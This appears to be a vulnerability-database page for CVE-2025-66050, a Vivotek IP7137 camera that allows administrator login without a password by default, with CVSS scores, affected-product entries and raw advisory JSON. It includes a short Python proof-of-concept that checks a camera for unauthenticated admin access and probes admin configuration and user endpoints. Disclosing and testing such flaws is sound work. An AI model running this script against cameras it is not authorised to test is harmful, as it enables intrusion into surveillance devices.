Security Vulnerability Report
CVE-2025-66050 CVSS 9.8 CRITICAL

Published: 2026-01-09 12:15:54
Last Modified: 2026-01-14 17:48:30

Description

By default, the Vivotek IP7137 camera with firmware version 0200a does not require any password when logging in as an administrator. While it is possible to set such a password, the user is not informed of the need to do so. The vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has reached its End-Of-Life phase, a fix is not expected to be released.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:vivotek:ip7137_firmware:0200a:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:vivotek:ip7137:-:*:*:*:*:*:*:* - NOT VULNERABLE
Vivotek IP7137 Firmware 0200a (confirmed affected)
Vivotek IP7137 all firmware versions (possibly affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-66050 PoC - Vivotek IP7137 Default Admin No Password
# Target: Vivotek IP7137 IP Camera
# Vulnerability: Default administrator account with no password

target_ip = "192.168.1.100"  # Replace with target camera IP
target_port = 80


def check_vivotek_vulnerability():
    """
    Check if Vivotek IP7137 camera is vulnerable to CVE-2025-66050
    """
    # Try to access the admin login page without credentials
    login_url = f"http://{target_ip}:{target_port}/login.cgi"
    try:
        # Request without any authentication
        response = requests.get(login_url, timeout=10)
        if response.status_code == 200:
            # Check if we can access admin features
            admin_url = f"http://{target_ip}:{target_port}/admin/"
            admin_response = requests.get(admin_url, timeout=10)
            if admin_response.status_code == 200:
                print("[+] VULNERABLE: Device allows admin access without password")
                print("[+] CVE-2025-66050 confirmed")
                return True
        print("[-] Device may not be vulnerable or is not Vivotek IP7137")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


def exploit_default_admin():
    """
    Exploit CVE-2025-66050 to gain admin access
    """
    base_url = f"http://{target_ip}:{target_port}"
    # Access admin configuration page
    config_endpoints = [
        "/admin/systeminfo",
        "/admin/network",
        "/admin/users",
        "/admin/config",
        "/cgi-bin/admin/getparam",
    ]
    for endpoint in config_endpoints:
        try:
            response = requests.get(base_url + endpoint, timeout=10)
            if response.status_code == 200:
                print(f"[+] Accessible endpoint: {endpoint}")
                print(f"[+] Response preview: {response.text[:200]}...")
        except requests.exceptions.RequestException:
            # Skip endpoints that cannot be reached
            pass


if __name__ == "__main__":
    print("CVE-2025-66050 Vivotek IP7137 No-Password Admin Exploit")
    check_vivotek_vulnerability()
    # Uncomment to exploit:
    # exploit_default_admin()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66050", "sourceIdentifier": "[email protected]", "published": "2026-01-09T12:15:53.587", "lastModified": "2026-01-14T17:48:29.730", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Vivotek IP7137 camera with firmware version 0200a by default dos not require to provide any password when logging in as an administrator. While it is possible to set up such a password, a user is not informed about such a need.\nThe vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has met End-Of-Life phase, a fix is not expected to be released."}, {"lang": "es", "value": "La cámara Vivotek IP7137 con la versión de firmware 0200a por defecto no requiere proporcionar ninguna contraseña al iniciar sesión como administrador. Si bien es posible configurar dicha contraseña, un usuario no es informado sobre dicha necesidad. El proveedor no ha respondido a la CNA. Posiblemente todas las versiones de firmware están afectadas. Dado que el producto ha alcanzado la fase de Fin de Vida Útil, no se espera que se lance una solución."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1393"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:vivotek:ip7137_firmware:0200a:*:*:*:*:*:*:*", "matchCriteriaId": "7FBD8C69-D2F8-46B0-AE09-F6296BD22414"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:vivotek:ip7137:-:*:*:*:*:*:*:*", "matchCriteriaId": "2BE1F29C-4CF4-46B7-862B-C4B3F00B70EE"}]}]}], "references": [{"url": "https://cert.pl/posts/2026/01/CVE-2025-66049", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}